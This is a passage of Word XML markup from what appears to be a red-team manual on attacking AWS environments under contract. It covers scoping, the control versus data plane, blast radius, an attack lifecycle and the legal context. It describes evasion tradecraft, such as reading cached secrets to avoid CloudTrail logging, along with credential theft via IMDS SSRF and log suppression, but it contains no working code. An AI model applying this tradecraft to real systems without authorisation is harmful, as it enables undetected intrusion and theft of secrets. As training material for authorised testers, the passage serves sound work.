          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Is Trust &amp; Safety notification required?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> If you will simulate password spraying at the IAM API, mass-spawn EC2 instances for cryptojacking emulation, or exercise Route53 zone-walking, file the form.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1021FEF7" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="36" w:after="36"/>
        <w:ind w:left="1008"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>What is the blue-team posture?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Is the customer's detection team in the loop (purple), or are they a blind target (red)? This drives every OPSEC decision in Chapters 15 and 16.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033F0D78"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Laye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IaaS (EC2</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Containers (EKS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PaaS (RDS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Serverless (Lambda</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Physical / Nitr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>o</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Hypervisor / OS hos</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Service control plan</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 (APIs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 (EKS API</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Service configuratio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(SG, IAM</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(aws-auth, IRSA</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(param, VPC</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(role, trigger</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Guest OS / runtim</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(pods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 (managed</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 (runtime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Application cod</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(schema</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 (handler</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Dat</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AWS-owned (out of scope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Shared / configuration (primary attack surface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Customer-owned (in scope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Shared-responsibility boundary by service class. Yellow rows are the primary attack surface for AWS offensive engagements. Green rows are also in scope but typically governed by the application-security portion of the contract. Red rows are AWS-managed and categorically out of scope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24F46FDD" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>1.2  Control plane vs. data plane attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50743EC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AWS is unusual among platforms because most of what you do to it runs through a single, highly audited API. Every call to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:CreateAccessKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ec2:RunInstances</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>s3:PutBucketPolicy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>lambda:CreateFunction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sts:AssumeRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> lands in CloudTrail with a principal, a source IP, a user-agent, a timestamp, and the full request parameters. That uniformity is the control plane. Everything that happens </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>inside</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> a resource you have created — a SQL query against RDS, a file read on an EC2 filesystem, a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>kubectl exec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> into a pod — is the data plane.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1698A8A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distinction matters because the two planes are logged differently, have different blast radiuses, and require different tradecraft. A control-plane attack leaves a clean audit trail that a defender with working CloudTrail and Athena can replay minute by minute. A data-plane attack can be nearly invisible to a defender who has not instrumented their EC2 instances with host-based logging, because AWS does not by default log what a process does inside an EC2. The same is true for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>kubectl exec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> traffic, RDS query text, or the bytes flowing through a Lambda function — unless the customer has opted into service-specific logging (VPC Flow Logs, RDS audit logs, GuardDuty Runtime Monitoring, EKS control-plane logs), the data plane is dark.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798A6155"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CONTROL PLAN</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sts.amazonaws.co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iam.amazonaws.co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ec2.amazonaws.co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s3.amazonaws.com (control</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lambda.amazonaws.co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eks.amazonaws.com (cluster API</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Logging: CloudTrail (all regions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Detection: GuardDuty, Athena, Detectiv</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Typical attacks: IAM privesc, role chain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snapshot sharing, bucket policy flip</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stack create, trail tampe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DATA PLAN</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guest OS (ssh, process, fs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object GET/PUT (bucket data</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RDS SQL querie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 invocation payloa</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Pod runtime / kubectl exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>c</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KMS encrypt / decryp</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Logging: opt-in per servic</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VPC Flow Logs, RDS audit, EKS ctl-plane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data events, GuardDuty Runtime Mon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Typical attacks: IMDS SSRF, ssm session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SQLi, kubectl exec, pre-signed URL repla</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Control plane vs. data plane. The control plane is uniformly logged to CloudTrail; the data plane is instrumented per service at customer opt-in. Most AWS-native detections catch control-plane abuse. Evasion tradecraft lives in moving operations to the data plane where possible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4CC4FE34" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:divId w:val="907962511"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>OPERATOR NOTE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C58E257" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:spacing w:after="216"/>
        <w:divId w:val="907962511"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">When you have the option of doing the same thing via control plane or data plane, the data plane is quieter. Example: reading secrets. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>secretsmanager:GetSecretValue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> lands in CloudTrail with the secret ARN and the principal, every time. But if you have a shell on an EC2 instance whose role can read the secret, running the aws-cli from that instance is still a control-plane call — you are not exiting the plane, you are just moving the source IP from your Kali box to an IP the customer ranges own. To really move to the data plane you need to read the decrypted secret out of a process that already has it cached (env var, memory, config file on disk) — no API call, no Clou</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>dTrail row.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EFE817" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>1.3  Blast radius</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A794F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Blast radius is the measure of how much damage one compromised primitive can do before it meets a boundary it cannot cross. In AWS the boundaries stack like nesting dolls:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4609D28B" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Resource.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> A single S3 bucket, one EC2 instance, one IAM user. The smallest blast radius.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DEF50B" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Service.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> All S3 buckets in an account; all EC2 instances in a region. Determined by the wildcard scope an IAM policy grants.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616B529A" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Region.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Most AWS services are regional. A role with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ec2:*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>us-east-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> can do nothing to an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>eu-west-1</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fleet if the condition keys enforce region. If they do not, regions are not a boundary at all.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4CD335" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Account.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> The canonical AWS security boundary. An IAM role scoped to a single account cannot reach another account unless an explicit trust relationship or resource policy lets it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374F935D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Organization.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Since 2017, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Organizations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> has been the top-level unit. An Organization Master (management) account can assume </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>OrganizationAccountAccessRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> into any member by default; SCPs applied at the root or OU level bind every principal beneath, including the member-account root user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D51B0D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Partition.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Commercial AWS, AWS GovCloud (US), and AWS China (Beijing/Ningxia) are separate partitions with separate trust roots. No cross-partition primitives exist at the service level. If your scope includes GovCloud you need a separate set of credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447B610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Blast-radius thinking is the difference between a finding that says "an attacker could read any S3 bucket in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>web-dev</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> account" and one that says "an attacker could assume </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>OrganizationAccountAccessRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>web-dev</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> into the Master and apply an SCP that disables logging in every child account." Those are different severities. The executive summary in Chapter 20 will live or die by whether you framed the finding at the right radius.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C46B9FD" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>1.4  The canonical AWS attack lifecycle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505A0B5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AWS compromises tend to follow the same generic lifecycle regardless of which entry vector started them. We revisit each phase in depth in later chapters; here is the thirty-second version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29718F5A"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Recon.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attribute an AWS account ID, enumerate its public footprint (S3 buckets, public AMIs, public RDS snapshots, exposed Lambda URLs, Route53 zones, CloudFront distributions), and identify candidate principals through error-leak probing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04953083"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Initial access.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Obtain AWS credentials — leaked access keys, IMDS SSRF exfiltration, OIDC-trusted CI pipeline, federated IdP compromise, phished console user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A72C9A2"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Enumeration.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Discover what the compromised principal can do. Run CloudFox, Pacu's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam__enum_permissions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>, PMapper, and ScoutSuite to build a permissions graph.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AE46F5"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Privilege escalation.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Move from the compromised principal to a more-privileged one using one of the IAM primitives in Chapter 8.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E50F8D"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Lateral movement.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Assume cross-account roles, pivot through SSM into private subnets, take over EKS worker nodes via IRSA, ride EventBridge into new accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1692794E"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Action on objectives.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Read the data, stage the exfil, or — if destructive impact is in scope — emulate ransomware, deletion, or availability attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C445A17" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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Persistence and cleanup.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Install durable re-entry, suppress logging where scope allows, and prepare the artifacts the final report requires.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3540D309" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>1.5  Regulatory and contractual context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ECE05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Scope decisions are shaped by the customer's regulatory environment. PCI-DSS 4.0 explicitly covers cloud-hosted cardholder data environments; FedRAMP moderate and high baselines govern how credentials are rotated and logged; HIPAA requires BAA-covered services to maintain audit logs; SOC 2 Type II auditors will want evidence of CloudTrail immutability. An attack that demonstrates CloudTrail tampering against a SOC 2 environment is a different-severity finding than the same primitive against an unregulated s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">tartup, because the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>remediation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> moves from "fix the IAM policy" to "fix the IAM policy and notify your auditor."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2466CB1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Always read the engagement letter for jurisdiction. A multinational's AWS accounts may span US, EU, and APAC regions, each with its own breach-notification regime. The CFAA in the United States is the most frequently cited statute for unauthorized access, but the EU Cybercrime Directive (2013/40/EU), UK Computer Misuse Act (1990, as amended), and equivalent statutes in Canada, Australia, and Singapore reach the same conduct. In-scope accounts and in-scope data must be enumerated in writing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168ACDC9" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:divId w:val="493188389"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>DEFENDER NOTE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66055EFA" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:spacing w:after="216"/>
        <w:divId w:val="493188389"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
